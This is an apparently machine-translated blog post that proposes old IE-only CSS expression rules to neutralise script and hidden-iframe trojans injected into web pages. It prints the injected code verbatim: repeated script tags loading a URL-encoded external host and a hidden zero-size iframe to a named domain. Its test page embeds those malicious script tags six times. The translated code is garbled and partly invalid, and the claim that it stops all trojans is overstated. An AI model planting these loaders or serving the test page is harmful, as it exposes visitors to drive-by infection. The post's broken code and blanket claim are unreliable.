Two lines of code solve all webpage Trojans

Not long ago Code Solutions to IFRAME Trojans (including server injection and client ARP injection) have been recognized by many friends. This is indeed a good way to avoid the storm. But now the network-mounted Trojan method has changed as I expected. Now, Trojans and Trojans are popular, after reading the websites of a few netizens, they are added to the top or bottom of the page:

Note: The following addresses contain Trojans, so do not access them easily:

<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
Sweating, inserting n identical <SCRIPT> tags in a row. Even if any patch is installed on the computer, visit the http: // % 76% 63% 63% 64% 63% 2e % 6e (or directly use thunder to download the patch ~ Now:

Document. Write ("<Div style = 'display: none'> ")
Document. Write ("<IFRAME src = http://a.158dm.com/b1.htm? Id = 017 width = 0 Height = 0> </iframe> ")
Document. Write ("</div> ")
Download ghost again with thunder. The charge is quite high!

...
VaR kfqq, qqs = "[color = Magenta] 784378237 [/color]"; qwfgsg = "llll \ xxxxxld"; kfqq = qqs;
(... Omitted) (there are n statistics of JS Code below)
I can't ignore the above situation. Think of a solution, bro. I drank a bowl of green bean porridge, put a lot of sugar, good to drink. Thought of the solution. The answer is obtained through a slight analysis. Let's take a look at the features of <SCRIPT> Trojans:

<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>

By the way, the SRC of the script Trojan is generally from an external domain, that is, the SRC is headers with HTTP. If it is a script of your website, HTTP is not required. Then, let's look at the original form of the Trojan, it also outputs IFRAME, JS Code, or other <Object> code, no matter how many, how much to kill.

Let's write CSS with me and solve them one by one. I wrote five different solutions. Let's test them:

Solution 1:

Copy code The Code is as follows: IFRAME {n1ifm: expression (this. src = 'about: blank ', this. outerhtml = '');}/* this line of code solves the problem of mounting an IFRAME Trojan */
Script {nojs1: expression (this. SRC. tolowercase (). indexof ('http') = 0 )? Document. Write ('Trojan is isolated successfully! '):'');}

Principle: Convert the <SCRIPT>-marked SRC file to lowercase, and check whether it is an external domain JS script file starting with "HTTP". If yes, the page content is cleared and the "Trojan is isolated successfully!" is written! ". Otherwise, it is displayed normally.

Disadvantage: the visitor cannot see the page infected with the <SCRIPT> Trojan.

Solution 2:

Copy code The Code is as follows: IFRAME {nifm2: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {no2js: expression (this. SRC. tolowercase (). indexof ('http') = 0 )? Document. Close ():'');}

Principle: Force disable document. Write () of JS files in external domains using document. Close. The trojan content has not been written yet. Only some of the content has been forcibly cached and output, and the rest will not be written.
Solution 3:

Copy code The Code is as follows: IFRAME {ni3fm: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {n3ojs: expression (this. SRC. tolowercase (). indexof ('http') = 0 )? Document.exe ccommand ('stop '):'');}

Principle: The same as the JS file to the external domain, immediately call the IE private Execcommand method to stop all requests on the page, so the subsequent external domain JS file is also forced to stop downloading. Just Like clicking the "stop" button in the browser. It seems that this is a method for js to simulate the ie stop button.

Solution 4:

Copy code The Code is as follows: IFRAME {nif4m: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {noj4s: expression (if (this. SRC. indexof ('HTTP ') = 0) This. src = 'res: // ieframe. dll/dnserror.htm ');}

Principle: overwrite the SRC of the JS file in the external domain to the address of the ie404 error page. In this way, the JS Code in the external domain will not be downloaded.

Solution 5:

Copy code The Code is as follows: IFRAME {nifm5: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {noj5s: expression (this. Id. tolowercase (). indexof ('lh ') = 0 )? Document. Write ('Trojan is isolated successfully! '):''));}

Page HTML of solution 5Source code<SCRIPT> to add an ID prefixed with "LH", such as lhweatherjsapi, <SCRIPT src = "***/**. JS "id =" lhsearchjsapi "> </SCRIPT>

The Code on the following page contains a trojan address, which has been repeated for six times on the page. You can test it using different methods above to see how I study it! (This test is dangerous. Make sure all patches are installed before testing)

Copy code The Code is as follows: <! Doctype HTML public "-// W3C // dtd xhtml 1.0 transitional // en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Title> CSS code that allows the JS Trojan process to stop quickly </title>
<Style type = "text/CSS" id = "linrstudio">
/* <! [CDATA [*/
IFRAME {nhk1: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {ngz1: expression (this. SRC. indexof ('http') = 0 )? Document. Close ():'');}
/* Later please pay attention to the latest Trojan processing method: http://www.nihaoku.cn/ff/api.htm */
/*]> */
</Style>
</Head>
<Body>
<SCRIPT type = "text/JavaScript" src = "1.js"> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = "http: // % 76% 63% 63% 64% 2e % 63% 6e" type = "text/JavaScript"> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I am page 1
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I'm from page 2
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I am 3 of the page itself
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
</Body>
</Html>

Among them, 1. JS is on its own site:

Document. Write ("I Am a JS file on this site ");
Document. Write (" ");
My test environment is:

Windows XP SP2 and Windows Vista SP1
IE6/IE7/IE8
All Patches have been installed.

In summary, all the current Trojan-mounting methods have been cracked, and CSS can be used to solve all the trojan problems, so that visitors will not be easily poisoned.

You should also take a closer look at the bugs in my code. If you have any bugs, you must discuss them to solve the problem! Or you may have another better way to discuss it.